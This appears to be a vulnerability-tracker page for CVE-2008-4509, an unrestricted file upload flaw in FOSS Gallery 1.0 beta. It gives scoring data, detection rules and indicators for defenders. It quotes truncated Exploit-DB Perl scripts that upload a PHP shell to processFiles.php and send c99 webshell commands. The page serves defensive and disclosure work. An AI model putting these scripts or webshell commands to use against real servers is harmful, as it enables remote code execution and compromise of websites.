CVE-2008-4509
published 2008-10-09CVE-2008-4509: Unrestricted file upload vulnerability in processFiles.php in FOSS Gallery Admin and FOSS Gallery Public 1.0 beta allows remote attackers to execute arbitrary…
PriorityP261critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
7.66%
93.8th percentile
Unrestricted file upload vulnerability in processFiles.php in FOSS Gallery Admin and FOSS Gallery Public 1.0 beta allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in the root directory.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| foss_gallery | foss_gallery | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect multipart/form-data POST requests to processFiles.php containing the fields 'uploadNeed' and 'uploadFile0' with a non-image (e.g., .php) file extension in the uploaded filename. ↗
- →Alert on HTTP GET requests to PHP files (e.g., shell.php, c99.php) placed in the web root immediately after a POST to processFiles.php, indicating successful webshell upload and execution. ↗
- →Detect c99 webshell command execution pattern in HTTP requests: query string containing 'act=cmd' combined with 'cmd_txt=1&submit=Execute' targeting an uploaded PHP file in the web root. ↗
- →Flag the response string 'uploaded sucessful' (note the typo) in HTTP responses from processFiles.php as a confirmation indicator of successful arbitrary file upload exploitation. ↗
- ·The vulnerability affects both FOSS Gallery Admin and FOSS Gallery Public 1.0 beta. The upload endpoint processFiles.php is shared between both products, so detection rules should not be scoped to only one variant. ↗
- ·Uploaded files land directly in the web root (root directory), not a sandboxed upload folder, making them immediately web-accessible and executable by the server. ↗
- ·No server-side image format validation is performed; any file extension is accepted. Detection must cover all executable extensions (.php, .php5, .phtml, etc.), not just .php. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
FOSS Gallery Public 1.0 - Arbitrary File Upload (PoC)
exploitdb·2008-10-05
CVE-2008-4509 FOSS Gallery Public 1.0 - Arbitrary File Upload (PoC)
FOSS Gallery Public 1.0 - Arbitrary File Upload (PoC)
---
FOSS Gallery Public Version
eNYe-Sec - www.enye-sec.org
-- Bug --
Website doesn't check the images format and you can upload PHP files.
-- Exploit --
http://localhost/shell.php
# milw0rm.com [2008-10-05]
Exploit-DB
FOSS Gallery Public 1.0 - Arbitrary File Upload
exploitdb·2008-10-05
CVE-2008-4509 FOSS Gallery Public 1.0 - Arbitrary File Upload
FOSS Gallery Public 1.0 - Arbitrary File Upload
---
# FOSS Gallery Public new();
$ua->timeout(12);
my $request = HTTP::Request->new();
my $response;
my $header;
my $url = $host."processFiles.php";
$response = $ua->request(POST $url, Content_Type => 'form-data',
Content => [ uploadNeed => "1", uploadFile0 => [$file]]);
$content = $response->content;
if ($content =~ /uploaded sucessful/) { print "\nExploited sucessfully.\n"; }
else { print "\nExploit failed\n"; exit;}
my $c99="c99.php";
chomp ($c99);
if ($file =~ /c99.php/)
{
$comando="?act=cmd&d=/&cmd=/&cmd_txt=1&submit=Execute";
print "\n";
my $final = $host.$c99.$comando;
my $ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(GET => $final);
$ua->timeout(10);
$doc = $ua->request($req)->as_string;
$kernel = $1 if ( $doc
Exploit-DB
FOSS Gallery Admin 1.0 - Arbitrary File Upload
exploitdb·2008-10-04
CVE-2008-4509 FOSS Gallery Admin 1.0 - Arbitrary File Upload
FOSS Gallery Admin 1.0 - Arbitrary File Upload
---
#!/usr/bin/perl
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# FOSS Gallery Admin Version
# eNYe-Sec - www.enye-sec.org
#
# Upload images is only allowed to the admin but the process to upload has
# 3 steps (with 3 pages). only the first page check the user permissions.
#
# STEPS:
# uploadForm1.php -> ask for the number of files you wish to upload
# uploadForm2.php -> ask for the files to upload
# processFiles.php -> process the file(s)
#
# Also image format is not validated and you can upload any file.
#
# You can POST directly in the 3th step (processFiles.php):
# - uploadNeed = 1 ... we only need to upload 1 file
# - uploadFile0 = shell.php ... the file to upload
use LWP::UserAgent;
use HTTP::Request:
No writeups or analysis indexed.
http://securityreason.com/securityalert/4379http://www.securityfocus.com/bid/31574https://exchange.xforce.ibmcloud.com/vulnerabilities/45683https://www.exploit-db.com/exploits/6670https://www.exploit-db.com/exploits/6674https://www.exploit-db.com/exploits/6680http://securityreason.com/securityalert/4379http://www.securityfocus.com/bid/31574https://exchange.xforce.ibmcloud.com/vulnerabilities/45683https://www.exploit-db.com/exploits/6670https://www.exploit-db.com/exploits/6674https://www.exploit-db.com/exploits/6680
2008-10-09
Published